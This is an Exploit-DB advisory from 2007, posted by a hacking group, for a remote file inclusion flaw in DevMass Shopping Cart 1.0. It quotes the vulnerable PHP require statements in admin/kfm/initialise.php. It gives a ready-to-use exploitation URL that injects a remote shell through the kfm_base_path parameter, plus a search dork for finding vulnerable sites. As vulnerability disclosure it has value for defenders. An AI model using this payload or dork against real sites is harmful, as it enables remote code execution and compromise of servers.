DevMass Shopping Cart 1.0 - Remote File Inclusion

EDB-ID:

4642


Author:

S.W.A.T.

Type:

webapps


Platform:

PHP

Date:

2007-11-22


========================================================================
||  ##    ##   ##           ##########   #######     ########         ||
||   ##  ##    ##########   ##########   ##   ##     ##               ||
||    ####     ##########   ##      ##   #######     ########         ||
||    ####     ##  ##  ##   ##      ##   #######           ##         ||
||   ##  ##    ##  ##  ##   ##########   ##    ##          ##         ||
||  ##    ##   ##  ##  ##   ##########   ##     ##   ########         ||
========================================================================
========================================================================
[*] DevMass Shopping Cart <= 1.0 Remote File Include Vulnerability    ||
[!] Download   : http://www.devmass.com/downloads/devmass.cart.1.0.tar||
[!] Author     : S.W.A.T.                                             ||
[!] Site       : wWw.XmorS.CoM - wWw.SvvaT.IR                         ||
[!] Y!ID       : Svvateam                                             ||
[!] E-Mail     : S.W.4.T@hackermail.CoM                               ||
[!] Location   : Iran - 071                                           ||
[!] Risk       : Moderate ( High )                                    ||
[!] Dork       : DevMass Shopping Cart                                ||
========================================================================
========================================================================
Vuln. code: admin/kfm/initialise.php            	              ||
                                                                      ||
require $kfm_base_path.'includes/lang.php'; 			      ||
require $kfm_base_path.'includes/db.php'; 			      ||
require $kfm_base_path.'includes/object.class.php';	   	      ||
require $kfm_base_path.'includes/session.class.php'; 		      ||
require $kfm_base_path.'includes/file.class.php'; 		      ||
require $kfm_base_path.'includes/image.class.php'; 		      ||
require $kfm_base_path.'includes/directory.class.php';                ||
                                                                      ||
                                                                      ||
========================================================================
[*] Exploitation :                                                    ||
                                                                      ||
[target]/[path]/admin/kfm/initialise.php?kfm_base_path=[Shell]        ||
								      ||
========================================================================
[!] We Are : Scorpiunix - Kamy4r - S.W.A.T. - D3vil_B0Y_Ir -          ||
[!] The_Editor - Silliconic - Sh3llH3ll                               ||
                                                                      ||
[!] I Love Xmors & All Member Of Them                                 ||
							              ||
[!] DeltaHackingGroup = ( Lammers Group :D ) ,,!,,                    ||
							              ||
[!] Special Thanks To : Dj7xpl From Y! UnderGround Group              ||
								      ||
[!] Tnx 2 : Str0ke - Google - SourceForge                             ||
========================================================================

# milw0rm.com [2007-11-22]